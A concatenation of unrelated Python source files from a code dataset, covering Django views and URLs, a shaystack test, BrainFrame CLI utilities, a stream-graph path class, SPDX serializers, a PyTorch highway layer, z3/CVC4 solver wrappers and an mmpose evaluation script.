# 3) Dedicated views that each switch to one fixed language.
def trans_en(request):
    """Switch the session language to English."""
    code = 'en'
    if translation.LANGUAGE_SESSION_KEY in request.session:
        del request.session[translation.LANGUAGE_SESSION_KEY]
    translation.activate(code)
    request.session[translation.LANGUAGE_SESSION_KEY] = code
    # BUG FIX: views must return an HttpResponse (previously returned None).
    return HttpResponse("Language Change to " + code)
def trans_ko(request):
    """Switch the session language to Korean."""
    # BUG FIX: was 'en' (copy-paste from trans_en); this view must be 'ko'.
    code = 'ko'
    if translation.LANGUAGE_SESSION_KEY in request.session:
        del request.session[translation.LANGUAGE_SESSION_KEY]
    translation.activate(code)
    request.session[translation.LANGUAGE_SESSION_KEY] = code
    # BUG FIX: views must return an HttpResponse (previously returned None).
    return HttpResponse("Language Change to " + code)
| StarcoderdataPython |
4934907 | <reponame>maykinmedia/drf-polymorphic<filename>testapp/urls.py
from django.contrib import admin
from django.urls import include, path
from drf_spectacular.views import SpectacularYAMLAPIView
from .views import PetView
# URL routing for the test app: admin site plus a small API namespace with
# the OpenAPI schema at /api/ and the pets endpoint at /api/pets/.
urlpatterns = [
    path("admin/", admin.site.urls),
    path(
        "api/",
        include(
            [
                # schema=None: the view introspects the URLconf at request time.
                path("", SpectacularYAMLAPIView.as_view(schema=None), name="schema"),
                path("pets/", PetView.as_view(), name="pets"),
            ]
        ),
    ),
]
| StarcoderdataPython |
6597415 | from unittest.mock import patch
import shaystack
from shaystack import Quantity, Grid, VER_3_0, Ref
from shaystack.ops import HaystackHttpRequest
from shaystack.providers import ping
@patch.object(ping.Provider, 'point_write_write')
def test_point_write_write_with_zinc(mock) -> None:
    # GIVEN
    """point_write with a zinc body forwards the write to the provider and
    answers 200 with a parseable zinc grid.

    Args:
        mock: patched ``ping.Provider.point_write_write``
    """
    envs = {'HAYSTACK_PROVIDER': 'shaystack.providers.ping'}
    mock.return_value = Grid(version=VER_3_0, columns=["level", "levelDis", "val", "who"])
    mime_type = shaystack.MODE_ZINC
    request = HaystackHttpRequest()
    # One write row: entity @1234, level 1, value 100.0, for 1 minute.
    grid = shaystack.Grid(columns=['id', "level", "val", "who", "duration"])
    grid.append({"id": Ref("1234"),
                 "level": 1,
                 "val": 100.0,
                 "who": "PPR",
                 "duration": Quantity(1, "min")})
    request.headers["Content-Type"] = mime_type
    request.headers["Accept"] = mime_type
    request.body = shaystack.dump(grid, mode=mime_type)
    # WHEN
    response = shaystack.point_write(envs, request, "dev")
    # THEN
    mock.assert_called_once_with(Ref("1234"), 1, 100, "PPR", Quantity(1, "min"), None)
    assert response.status_code == 200
    assert response.headers["Content-Type"].startswith(mime_type)
    assert shaystack.parse(response.body, mime_type) is not None
| StarcoderdataPython |
213777 | import os
import subprocess
import sys
from pathlib import Path
from threading import RLock
from typing import List, Optional
import distro
import i18n
from . import print_utils
BRAINFRAME_GROUP_ID = 1337
"""An arbitrary group ID value for the 'brainframe' group. We have to specify
the ID of the group manually to ensure that the host machine and the Docker
containers agree on it.
"""
class _CurrentCommand:
    """Contains information on the current command being run as a subprocess, if one
    exists.

    Commands are run serially (see ``run``), so at most one process is
    tracked at a time; the lock guards hand-off between the runner and a
    signal handler calling ``send_signal``.
    """

    _process: Optional[subprocess.Popen] = None
    _lock = RLock()
    _interrupted = False

    @property
    def process(self) -> Optional[subprocess.Popen]:
        """
        :return: The currently running subprocess, or None if no subprocess is running
        """
        with self._lock:
            return self._process

    @process.setter
    def process(self, value: subprocess.Popen) -> None:
        with self._lock:
            # poll() is None while the previous process is still running.
            if self._process is not None and self._process.poll() is None:
                # This is never expected to happen, as subprocesses are run in serial
                # and in a blocking fashion
                raise RuntimeError("Only one process may be run at once")
            self._process = value

    @property
    def interrupted(self) -> bool:
        """
        :return: If true, the subprocess was interrupted by a signal
        """
        # NOTE(review): read without taking _lock; a bool read is atomic in
        # CPython, but confirm this is deliberate.
        return self._interrupted

    def send_signal(self, sig: int):
        """
        :param sig: The signal to send to the subprocess
        """
        with self._lock:
            if self._process is None:
                message = (
                    "Attempted to send a signal when no process was running"
                )
                raise RuntimeError(message)
            self._interrupted = True
            self._process.send_signal(sig)
current_command = _CurrentCommand()
def create_group(group_name: str, group_id: int):
    """Create the system group *group_name* with GID *group_id*.

    A pre-existing group is reported and left untouched; a failed
    ``groupadd`` aborts the program with a translated error message.
    """
    # getent exits 0 when the group already exists.
    lookup = run(["getent", "group", group_name], exit_on_failure=False)
    if lookup.returncode == 0:
        print_utils.translate("install.group-exists")
        return

    creation = run(["groupadd", group_name, "--gid", str(group_id)])
    if creation.returncode != 0:
        print_utils.fail_translate(
            "install.create-group-failure", error=str(creation.stderr)
        )
def added_to_group(group_name):
    """Checks if the user has been added to the group, even if the group
    addition hasn't been applied yet (i.e. by re-logging). Compare to
    `currently_in_group`.
    """
    # `id -Gn <user>` lists the user's configured groups, not the session's.
    id_output = run(
        ["id", "-Gn", _current_user()],
        stdout=subprocess.PIPE,
        encoding="utf-8",
        print_command=False,
    )
    member_groups = id_output.stdout.readline().split()
    return group_name in member_groups
def currently_in_group(group_name):
    """Checks if the user is currently in the group. This will be False if the
    user was added to the group but the change hasn't been applied yet. Compare
    to `added_to_group`.
    """
    # Without a username, `id -Gn` reports the groups of the current session.
    id_output = run(
        ["id", "-Gn"],
        stdout=subprocess.PIPE,
        encoding="utf-8",
        print_command=False,
    )
    session_groups = id_output.stdout.readline().split()
    return group_name in session_groups
def add_to_group(group_name):
    """Append the invoking (non-root) user to *group_name* via ``usermod -a -G``."""
    print_utils.translate("general.adding-to-group", group=group_name)
    run(["usermod", "-a", "-G", group_name, _current_user()])
def is_root():
    """Return True when running with effective UID 0 (root / under sudo)."""
    return os.geteuid() == 0
def give_brainframe_group_rw_access(paths: List[Path]):
    """Recursively grant the 'brainframe' group read/write access to *paths*."""
    path_args = list(map(str, paths))
    run(["chgrp", "-R", "brainframe"] + path_args)
    run(["chmod", "-R", "g+rw"] + path_args)
def _current_user():
    """Return the username of the human invoking this tool.

    Under sudo, $SUDO_USER holds the invoking (non-root) user; otherwise
    fall back to $LOGNAME.
    "Why not use $USER here?" you might ask. Apparently $LOGNAME is a
    POSIX standard and $USER is not.
    https://unix.stackexchange.com/a/76369/117461
    """
    sudo_user = os.environ.get("SUDO_USER")
    if sudo_user is not None:
        return sudo_user
    # BUG FIX: os.environ.get("SUDO_USER", os.environ["LOGNAME"]) evaluated
    # the default eagerly, raising KeyError when LOGNAME was unset even
    # though SUDO_USER was available.
    return os.environ["LOGNAME"]
def run(
    command: List[str],
    print_command=True,
    exit_on_failure=True,
    *args,
    **kwargs,
) -> subprocess.Popen:
    """A small wrapper around subprocess.run.

    Publishes the child to the module-level ``current_command`` so signal
    handlers can forward signals to it, then blocks until completion.

    :param command: The command to run
    :param print_command: If True, the command will be printed before being run
    :param exit_on_failure: If True, the application will exit if the command
        results in a non-zero exit code
    :return: the completed ``Popen`` object
    """
    if print_command:
        print_utils.print_color(" ".join(command), print_utils.Color.MAGENTA)

    current_command.process = subprocess.Popen(command, *args, **kwargs)
    current_command.process.wait()

    if current_command.interrupted:
        # A signal was sent to the command before it finished
        print_utils.fail_translate("general.interrupted")
    elif current_command.process.returncode != 0 and exit_on_failure:
        # The command failed during normal execution
        sys.exit(current_command.process.returncode)

    return current_command.process
# Consulted by is_supported(); extend here when qualifying a new release.
_SUPPORTED_DISTROS = {
    "Ubuntu": ["18.04", "20.04"],
}
"""A dict whose keys are supported Linux distribution names and whose values
are all supported versions for that distribution.
"""
def is_supported() -> bool:
    """
    :return: True if the user is on an officially supported Linux distribution
    """
    name, version, _ = distro.linux_distribution()
    return version in _SUPPORTED_DISTROS.get(name, [])
| StarcoderdataPython |
9679731 | import matplotlib.pyplot as plt
class Path:
    """A temporal path in a stream graph: a sequence of links traversed at
    non-decreasing times from a source node to a destination node."""

    def __init__(self,
                 times=None,
                 links=None,
                 ):
        """
        A basic constructor for a ``Path`` object

        :param times : A list of times corresponding to the links (first time = beginning ; last time = ending)
        :param links : A list of links composing the path. (first node = source ; last node = destination)
        """
        self.times = times
        self.links = links

    def add_link(self, l, t):
        """Append link *l* traversed at time *t* to the end of the path."""
        self.times.append(t)
        self.links.append(l)

    def length(self):
        """Return the number of links in the path."""
        return len(self.links)

    def duration(self):
        """Return the elapsed time between the first and last traversal."""
        return self.times[-1] - self.times[0]

    def plot(self, S, color="#18036f",
             markersize=10, dag=False, fig=None):
        """
        Draw a path on the ``StreamGraph`` object *S*

        :param S: stream graph the path lives in
        :param color: color used for the path's segments and markers
        :param markersize: size of the source/destination/turn markers
        :param dag: if True, draw the condensation DAG as background instead of S
        :param fig: existing matplotlib figure to draw on (a new one is created if None)
        :return: the matplotlib figure
        """
        if fig is None:
            fig, ax = plt.subplots()
        else:
            ax = plt.gca()
        # Background: either the condensation DAG or the stream graph itself.
        if dag:
            dag = S.condensation_dag()
            dag.plot(node_to_label=S.node_to_label, ax=ax)
        else:
            S.plot(ax=ax)
        # Plot Source
        id_source = S.nodes.index(self.links[0][0])
        plt.plot([self.times[0]], [id_source], color=color,
                 marker='o', alpha=0.8, markersize=markersize)
        # Plot Destination
        id_destination = S.nodes.index(self.links[-1][1])
        plt.plot([self.times[-1]], [id_destination], color=color,
                 marker='o', alpha=0.8, markersize=markersize)
        # Plot Path
        for i in range(self.length()):
            l = self.links[i]
            t = self.times[i]
            id1 = S.nodes.index(l[0])
            id2 = S.nodes.index(l[1])
            idmax = max(id1, id2)
            idmin = min(id1, id2)
            # Vertical segment: the link traversal at time t.
            plt.vlines(t, ymin=idmin, ymax=idmax, linewidth=6, alpha=0.8, color=color)
            if i != self.length() - 1:
                # Horizontal segment: waiting on node id2 until the next hop.
                plt.hlines(id2, xmin=t, xmax=self.times[i + 1],
                           linewidth=4, alpha=0.8, color=color)
                # Plot marker
                if t != self.times[i + 1]:
                    plt.plot([t], [id2], color=color,
                             marker='>', alpha=0.8, markersize=markersize)
            if i != 0 and (t, id1) != (self.times[0], id_source) != (self.times[-1], id_destination):
                # Plot marker
                if id1 == idmin:
                    plt.plot([t], [id1], color=color,
                             marker='^', alpha=0.8, markersize=markersize)
                else:
                    plt.plot([t], [id1], color=color,
                             marker='v', alpha=0.8, markersize=markersize)
        plt.tight_layout()
        return fig

    def check_coherence(self, S):
        """Verify every link of the path exists in *S* (in either direction)
        and is present at its traversal time; raise ValueError otherwise."""
        for i in range(self.length()):
            l = self.links[i]
            l_ = (self.links[i][1], self.links[i][0]) # Inverse the order of the link
            if l not in S.links and l_ not in S.links:
                raise ValueError("Link : " + str(l) + " does not exists in the Stream Graph !")
            else:
                t = self.times[i]
                if l in S.links:
                    id_link = S.links.index(l)
                else:
                    id_link = S.links.index(l_)
                is_present = False
                # link_presence stores flat [begin, end, begin, end, ...] pairs.
                for lt0, lt1 in zip(S.link_presence[id_link][::2], S.link_presence[id_link][1::2]):
                    if lt0 <= t <= lt1:
                        is_present = True
                if not is_present:
                    raise ValueError("Link : " + str(l) + " does not exists at time " + str(t) + " !")
        print("Check Path Coherence ok !")
        return
| StarcoderdataPython |
154641 | """Test_qpushbutton module."""
import unittest
class TestQPushButton(unittest.TestCase):
    """Unit tests for the q3widgets QPushButton wrapper."""

    def test_enabled(self) -> None:
        """The enabled flag toggles the control on and off."""
        from pineboolib.q3widgets import qpushbutton

        widget = qpushbutton.QPushButton()
        self.assertTrue(widget.enabled)
        widget.enabled = False
        self.assertFalse(widget.enabled)

    def test_label(self) -> None:
        """setTextLabel stores a label that is retrievable via .text."""
        from pineboolib.q3widgets import qpushbutton

        widget = qpushbutton.QPushButton()
        widget.setTextLabel("etiqueta")
        label: str = str(widget.text)  # type: ignore
        self.assertEqual(label, "etiqueta")
| StarcoderdataPython |
5161669 | <reponame>Ugtan/spdx-online-tools
# -*- coding: utf-8 -*-
# Copyright (c) 2017 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from api.models import ValidateFileUpload,ConvertFileUpload,CompareFileUpload,CheckLicenseFileUpload
class ValidateSerializer(serializers.HyperlinkedModelSerializer):
    """POST validate API request fields"""
    # Read-only link to the uploading user, rendered as the user's id.
    owner = serializers.SlugRelatedField(
        read_only=True,
        slug_field='id'
    )

    class Meta:
        model = ValidateFileUpload
        fields = ('created', 'file', 'owner')
class ValidateSerializerReturn(serializers.ModelSerializer):
    """Response Fields to be returned to the user"""

    class Meta:
        model = ValidateFileUpload
        # Adds the validation outcome (result/status) to the request fields.
        fields = ('created', 'file', 'owner', 'result', 'status')
class ConvertSerializer(serializers.HyperlinkedModelSerializer):
    """POST convert API request fields"""
    # Read-only link to the uploading user, rendered as the user's id.
    owner = serializers.SlugRelatedField(
        read_only=True,
        slug_field='id'
    )

    class Meta:
        model = ConvertFileUpload
        fields = ('created', 'file', 'owner', 'cfilename', 'from_format', 'to_format', 'tagToRdfFormat')
class ConvertSerializerReturn(serializers.ModelSerializer):
    """Response Fields to be returned to the user"""

    class Meta:
        model = ConvertFileUpload
        # Adds the conversion outcome (result/message/status) to the request fields.
        fields = ('created', 'file', 'owner', 'result', 'from_format', 'to_format', 'tagToRdfFormat', 'cfilename', 'message', 'status')
class CompareSerializer(serializers.HyperlinkedModelSerializer):
    """POST compare API request fields"""
    # Read-only link to the uploading user, rendered as the user's id.
    owner = serializers.SlugRelatedField(
        read_only=True,
        slug_field='id'
    )

    class Meta:
        model = CompareFileUpload
        fields = ('created', 'file1', 'file2', 'owner', 'rfilename')
class CompareSerializerReturn(serializers.ModelSerializer):
    """Response Fields to be returned to the user"""

    class Meta:
        model = CompareFileUpload
        # Adds the comparison outcome (result/message/status) to the request fields.
        fields = ('created', 'file1', 'file2', 'owner', 'result', 'rfilename', 'message', 'status')
class CheckLicenseSerializer(serializers.HyperlinkedModelSerializer):
    """POST validate API request fields"""
    # Read-only link to the uploading user, rendered as the user's id.
    owner = serializers.SlugRelatedField(
        read_only=True,
        slug_field='id'
    )

    class Meta:
        model = CheckLicenseFileUpload
        fields = ('created', 'file', 'owner')
class CheckLicenseSerializerReturn(serializers.ModelSerializer):
    """Response Fields to be returned to the user"""

    class Meta:
        model = CheckLicenseFileUpload
        # Adds the license-check outcome (result/status) to the request fields.
        fields = ('created', 'file', 'owner', 'result', 'status')
| StarcoderdataPython |
384470 | <gh_stars>10-100
class ServiceReviewHistory:
    """Record of one review event for a service: who reviewed it, in what
    state, and the relevant timestamps. Fields are exposed read-only via
    properties and serialized as a plain dict by ``to_dict``."""

    def __init__(self, org_uuid, service_uuid, service_metadata, state, reviewed_by, reviewed_on, created_on,
                 updated_on):
        self._org_uuid = org_uuid
        self._service_uuid = service_uuid
        self._service_metadata = service_metadata
        self._state = state
        self._reviewed_by = reviewed_by
        self._reviewed_on = reviewed_on
        self._created_on = created_on
        self._updated_on = updated_on

    def to_dict(self):
        """Serialize the record as a dict keyed by public field name."""
        field_names = (
            "org_uuid", "service_uuid", "service_metadata", "state",
            "reviewed_by", "reviewed_on", "created_on", "updated_on",
        )
        return {name: getattr(self, "_" + name) for name in field_names}

    @property
    def org_uuid(self):
        return self._org_uuid

    @property
    def service_uuid(self):
        return self._service_uuid

    @property
    def service_metadata(self):
        return self._service_metadata

    @property
    def state(self):
        return self._state

    @property
    def reviewed_by(self):
        return self._reviewed_by

    @property
    def reviewed_on(self):
        return self._reviewed_on

    @property
    def created_on(self):
        return self._created_on

    @property
    def updated_on(self):
        return self._updated_on
| StarcoderdataPython |
4824012 | from torch import nn as nn
import torch
from .initialized_conv1d import Initialized_Conv1d
class Highway(nn.Module):
    """Stack of highway layers over 1-D convolutional projections.

    Each layer computes ``gate * dropout(linear(x)) + (1 - gate) * x`` with
    sigmoid gates, leaving the channel/length dimensions unchanged.
    """

    def __init__(self, dropout, layer_num, size):
        """
        :param dropout: dropout probability applied to the nonlinear branch
        :param layer_num: number of stacked highway layers
        :param size: channel dimension of the input/output
        """
        super().__init__()
        self.n = layer_num
        self.linear = nn.ModuleList([Initialized_Conv1d(size, size, relu=False, bias=True) for _ in range(self.n)])
        self.gate = nn.ModuleList([Initialized_Conv1d(size, size, bias=True) for _ in range(self.n)])
        self.dropout = nn.Dropout(dropout)
        # Removed a stray no-op `self.children()` call that discarded its result.

    def forward(self, x):
        # x: shape [batch_size, hidden_size, length]
        # (Removed a dead local `dropout = 0.1` that shadowed nothing and was
        # never used — dropout comes from the module configured in __init__.)
        for i in range(self.n):
            gate = torch.sigmoid(self.gate[i](x))
            nonlinear = self.dropout(self.linear[i](x))
            x = gate * nonlinear + (1 - gate) * x
        return x
| StarcoderdataPython |
6483760 | # Copyright (c) 2017, Fundacion Dr. <NAME>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import re
import subprocess
from barf.core.smt.smtsymbol import Bool
logger = logging.getLogger(__name__)
def _check_solver_installation(solver):
    """Return True when the *solver* binary can be located via ``which``.

    Only a ``which`` exit code of 1 (not found) yields False; any other
    CalledProcessError is swallowed and treated as installed, matching the
    original behavior.
    """
    installed = True
    try:
        subprocess.check_output(["which", solver])
    except subprocess.CalledProcessError as error:
        if error.returncode == 0x1:
            installed = False
    return installed
class SmtSolverNotFound(Exception):
    """Raised when the required SMT solver binary is not installed on PATH."""
    pass
class Z3Solver(object):
    """Thin SMT-LIB v2 front-end to a ``z3`` child process over stdin/stdout.

    NOTE(review): the pipes are opened without an encoding and commands are
    written as str — this presumes Python 2 (or text-mode pipes); confirm
    before running under Python 3.
    """

    def __init__(self):
        self._name = "z3"
        self._status = "unknown"
        self._declarations = {}
        self._constraints = []
        self._process = None

        self._check_solver()
        self._start_solver()

    def _check_solver(self):
        """Abort construction when the z3 binary is missing."""
        if not _check_solver_installation(self._name):
            raise SmtSolverNotFound("{} solver is not installed".format(self._name))

    def _start_solver(self):
        """Spawn z3 in interactive SMT2 mode and configure it."""
        self._process = subprocess.Popen("z3 -smt2 -in", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)

        # Set z3 declaration scopes.
        self._write("(set-option :global-decls false)")
        self._write("(set-logic QF_AUFBV)")

    def _stop_solver(self):
        """Kill the child process if it is still around (idempotent)."""
        if self._process:
            self._process.kill()
            self._process.wait()
            self._process = None

    def _write(self, command):
        """Send one SMT-LIB command line to the solver."""
        logger.debug("> %s", command)
        # writelines over a str writes it character-wise; effectively write().
        self._process.stdin.writelines(command + "\n")

    def _read(self):
        """Read one response line from the solver, stripping the newline."""
        response = self._process.stdout.readline()[:-1]
        logger.debug("< %s", response)
        return response

    def __del__(self):
        self._stop_solver()

    def __str__(self):
        # Dump the accumulated script: declarations followed by assertions.
        declarations = [d.declaration for d in self._declarations.values()]
        constraints = ["(assert {})".format(c) for c in self._constraints]

        return "\n".join(declarations + constraints)

    def add(self, constraint):
        """Assert a Bool constraint; invalidates any cached sat status."""
        assert isinstance(constraint, Bool)

        self._write("(assert {})".format(constraint))
        self._constraints.append(constraint)
        self._status = "unknown"

    def check(self):
        """Run (check-sat) lazily; returns 'sat', 'unsat' or 'unknown'."""
        assert self._status in ("sat", "unsat", "unknown")
        if self._status == "unknown":
            self._write("(check-sat)")
            self._status = self._read()
        return self._status

    def reset(self):
        """Restart the solver process and clear all state."""
        self._stop_solver()

        self._status = "unknown"
        self._declarations = {}
        self._constraints = []

        self._start_solver()

    def get_value(self, expr):
        """Query the model value of *expr* (requires a sat result).

        z3 prints bit-vector values as ``#x<hex>``; parse the hex digits.
        """
        assert self.check() == "sat"

        self._write("(get-value ({}))".format(expr))
        response = self._read()
        regex = r"\(\(([^\s]+|\(.*\))\s#x([^\s]+)\)\)"
        match = re.search(regex, response).groups()[1]
        return int(match, 16)

    def declare_fun(self, name, fun):
        """Register and emit a declaration; duplicate names are rejected."""
        if name in self._declarations:
            raise Exception("Symbol already declare.")
        self._declarations[name] = fun
        self._write(fun.declaration)

    @property
    def declarations(self):
        return self._declarations
class CVC4Solver(object):
    """Thin SMT-LIB v2 front-end to a ``cvc4`` child process over stdin/stdout.

    Near-duplicate of ``Z3Solver``; only the launch command, the startup
    options and the (get-value) output format differ. NOTE(review): as with
    Z3Solver, the unencoded pipes presume Python 2 / text-mode pipes.
    """

    def __init__(self):
        self._name = "cvc4"
        self._status = "unknown"
        self._declarations = {}
        self._constraints = []
        self._process = None

        self._check_solver()
        self._start_solver()

    def _check_solver(self):
        """Abort construction when the cvc4 binary is missing."""
        if not _check_solver_installation(self._name):
            raise SmtSolverNotFound("{} solver is not installed".format(self._name))

    def _start_solver(self):
        """Spawn cvc4 in incremental SMT2 mode and configure it."""
        self._process = subprocess.Popen("cvc4 --incremental --lang=smt2", shell=True,
                                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)

        # Set CVC4 declaration scopes.
        self._write("(set-logic QF_AUFBV)")
        self._write("(set-option :produce-models true)")

    def _stop_solver(self):
        """Kill the child process if it is still around (idempotent)."""
        if self._process:
            self._process.kill()
            self._process.wait()
            self._process = None

    def _write(self, command):
        """Send one SMT-LIB command line to the solver."""
        logger.debug("> %s", command)
        # writelines over a str writes it character-wise; effectively write().
        self._process.stdin.writelines(command + "\n")

    def _read(self):
        """Read one response line from the solver, stripping the newline."""
        response = self._process.stdout.readline()[:-1]
        logger.debug("< %s", response)
        return response

    def __del__(self):
        self._stop_solver()

    def __str__(self):
        # Dump the accumulated script: declarations followed by assertions.
        declarations = [d.declaration for d in self._declarations.values()]
        constraints = ["(assert {})".format(c) for c in self._constraints]

        return "\n".join(declarations + constraints)

    def add(self, constraint):
        """Assert a Bool constraint; invalidates any cached sat status."""
        assert isinstance(constraint, Bool)

        self._write("(assert {})".format(constraint))
        self._constraints.append(constraint)
        self._status = "unknown"

    def check(self):
        """Run (check-sat) lazily; returns 'sat', 'unsat' or 'unknown'."""
        assert self._status in ("sat", "unsat", "unknown")
        if self._status == "unknown":
            self._write("(check-sat)")
            self._status = self._read()
        return self._status

    def reset(self):
        """Restart the solver process and clear all state."""
        self._stop_solver()

        self._status = "unknown"
        self._declarations = {}
        self._constraints = []

        self._start_solver()

    def get_value(self, expr):
        """Query the model value of *expr* (requires a sat result).

        CVC4 prints bit-vector values as ``(_ bv<decimal> <width>)``.
        """
        assert self.check() == "sat"

        self._write("(get-value ({}))".format(expr))
        response = self._read()
        regex = r"\(\(([^\s]+|\(.*\))\s\(_\sbv([0-9]*)\s[0-9]*\)\)\)"
        match = re.search(regex, response).groups()[1]
        return int(match)

    def declare_fun(self, name, fun):
        """Register and emit a declaration; duplicate names are rejected."""
        if name in self._declarations:
            raise Exception("Symbol already declare.")
        self._declarations[name] = fun
        self._write(fun.declaration)

    @property
    def declarations(self):
        return self._declarations
1632843 | import argparse
import os
import os.path as osp
import mmcv
import torch
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import get_dist_info, init_dist, load_checkpoint
from mmpose.apis import multi_gpu_test, single_gpu_test
from mmpose.core import wrap_fp16_model
from mmpose.datasets import build_dataloader, build_dataset
from mmpose.models import build_posenet
# for test-dev
import json
import numpy as np
class NpEncoder(json.JSONEncoder):
    """JSON encoder that downcasts NumPy scalars/arrays to native types."""

    def default(self, obj):
        if isinstance(obj, np.integer):
            return int(obj)
        if isinstance(obj, np.floating):
            return float(obj)
        if isinstance(obj, np.ndarray):
            return obj.tolist()
        # Anything else: defer to the base class (raises TypeError).
        return super(NpEncoder, self).default(obj)
def parse_args():
    """Parse command-line arguments for the mmpose test entry point.

    Also exports LOCAL_RANK into the environment (from --local_rank) when
    it is not already set, as required by distributed launchers.
    """
    parser = argparse.ArgumentParser(description='mmpose test model')
    parser.add_argument('config', help='test config file path')
    parser.add_argument('checkpoint', help='checkpoint file')
    parser.add_argument('--out', help='output result file')
    parser.add_argument(
        '--eval',
        default='mAP',
        nargs='+',
        help='evaluation metric, which depends on the dataset,'
        ' e.g., "mAP" for MSCOCO')
    parser.add_argument(
        '--gpu_collect',
        action='store_true',
        help='whether to use gpu to collect results')
    parser.add_argument('--tmpdir', help='tmp dir for writing some results')
    parser.add_argument(
        '--launcher',
        choices=['none', 'pytorch', 'slurm', 'mpi'],
        default='none',
        help='job launcher')
    parser.add_argument('--local_rank', type=int, default=0)
    args = parser.parse_args()
    if 'LOCAL_RANK' not in os.environ:
        os.environ['LOCAL_RANK'] = str(args.local_rank)
    return args
def merge_configs(cfg1, cfg2):
    """Merge *cfg2* into a copy of *cfg1*.

    Values from cfg2 overwrite cfg1 on key collisions; entries whose value
    is None are ignored. Neither input dict is mutated; either may be None.

    :return: the merged dict
    """
    cfg1 = {} if cfg1 is None else cfg1.copy()
    cfg2 = {} if cfg2 is None else cfg2
    for k, v in cfg2.items():
        # BUG FIX: `if v:` also dropped legitimate falsy values (0, False,
        # ""); the documented contract is to ignore only None.
        if v is not None:
            cfg1[k] = v
    return cfg1
def main():
    """Run mmpose inference on the test split and, on rank 0, dump COCO
    test-dev style keypoint results to JSON and print the evaluation."""
    args = parse_args()
    cfg = mmcv.Config.fromfile(args.config)
    # set cudnn_benchmark
    if cfg.get('cudnn_benchmark', False):
        torch.backends.cudnn.benchmark = True
    # Inference only: drop pretrained init and switch the dataset to test mode.
    cfg.model.pretrained = None
    cfg.data.test.test_mode = True
    # Work dir derived from the config file name: ./work_dirs/<config-stem>.
    args.work_dir = osp.join('./work_dirs',
                             osp.splitext(osp.basename(args.config))[0])
    mmcv.mkdir_or_exist(osp.abspath(args.work_dir))
    # init distributed env first, since logger depends on the dist info.
    if args.launcher == 'none':
        distributed = False
    else:
        distributed = True
        init_dist(args.launcher, **cfg.dist_params)
    # build the dataloader
    # TODO: support multiple images per gpu (only minor changes are needed)
    dataset = build_dataset(cfg.data.test, dict(test_mode=True))
    data_loader = build_dataloader(
        dataset,
        samples_per_gpu=1,
        workers_per_gpu=cfg.data.workers_per_gpu,
        dist=distributed,
        shuffle=False)
    # build the model and load checkpoint
    model = build_posenet(cfg.model)
    fp16_cfg = cfg.get('fp16', None)  # None unless fp16 is configured
    if fp16_cfg is not None:
        wrap_fp16_model(model)
    _ = load_checkpoint(model, args.checkpoint, map_location='cpu')
    # for backward compatibility
    if not distributed:
        model = MMDataParallel(model, device_ids=[0])
        outputs = single_gpu_test(model, data_loader)
    else:
        model = MMDistributedDataParallel(
            model.cuda(),
            device_ids=[torch.cuda.current_device()],
            broadcast_buffers=False)
        # print(args.gpu_collect) # False
        outputs = multi_gpu_test(model, data_loader, args.tmpdir,
                                 args.gpu_collect)
    rank, _ = get_dist_info()
    eval_config = cfg.get('eval_config', {})
    eval_config = merge_configs(eval_config, dict(metric=args.eval))
    args.out = args.work_dir + '/test_dev2017_results_kps.json'
    # Only rank 0 holds the gathered outputs, so all result handling is here.
    if rank == 0:
        if args.out:
            # output_file_path = args.work_dir + '/outputs.json'
            # print(f'\nwriting outputs to {output_file_path}')
            # print(type(outputs))  # list; must be handled under rank==0 because only the first GPU has the outputs
            # with open(output_file_path,'w') as f:
            #     json.dump(outputs, f, cls=NpEncoder)  # NpEncoder needed: outputs contain np.array, which json cannot serialize
            print(f'\nwriting results to {args.out}')
            results = []
            for img in outputs:
                for i, person in enumerate(img[0]):
                    # First 3 columns per joint: x, y, visibility/score.
                    kps = person[:, :3]
                    kps = kps.reshape((-1)).round(3).tolist()
                    kps = [round(k, 3) for k in kps]  # keep 3 decimal places (NOTE(review): redundant with .round(3) above)
                    # score = round(float(img[1][i]), 3)  # element 5 is bbox_score; see mmpose/models/detectors/top_down.py line 272
                    score = round(float(img[1][i][5]),3)
                    # NOTE(review): image id assumed to be chars [19:31] of the image path string -- confirm against dataset layout.
                    id = ''
                    for key in img[2][19:31]:
                        id = id + key
                    results.append({
                        'category_id': int(1),
                        'image_id': int(id),
                        'keypoints': kps,
                        'score': score
                    })
            with open(args.out,'w') as fid:
                json.dump(results, fid)
        # mmcv.dump(outputs, args.out)
        print(dataset.evaluate(outputs, args.work_dir, **eval_config))
if __name__ == '__main__':
main()
| StarcoderdataPython |
1649528 | <reponame>zhmsg/dms
#! /usr/bin/env python
# coding: utf-8
__author__ = 'ZhouHeng'
from TableTool import DBTool
